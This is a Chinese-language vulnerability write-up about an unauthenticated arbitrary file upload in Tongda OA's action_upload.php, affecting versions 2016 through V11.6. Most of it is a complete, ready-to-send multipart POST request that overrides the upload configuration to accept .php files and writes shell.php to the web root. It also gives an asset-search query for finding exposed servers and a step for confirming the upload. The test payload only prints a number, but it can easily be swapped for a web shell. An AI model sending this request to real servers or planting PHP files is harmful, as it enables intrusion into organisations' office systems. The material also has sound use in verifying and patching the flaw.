登录 白背景

通达OA action存在前台任意文件上传漏洞

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞。

二影响版本

  • 通达OA 2016 - 通达OA V11.6

三、资产测绘

  • hunterapp.name="通达 OA"
  • 特征

image.png

四、漏洞复现

POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 605

--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

filename
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

10000
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

shell
--00content0boundary00
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
--00content0boundary00
Content-Disposition: form-data; name="mufile"

submit
--00content0boundary00
Content-Disposition: form-data; name="filename"; filename="shell.php"

<?php echo 123;?>
--00content0boundary00--

image.png
上传文件地址为http://ip/shell.php,发起get请求上传后文件地址,响应200,表示存在该漏洞,否则不存在
image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/wub2eonlswgnp8ei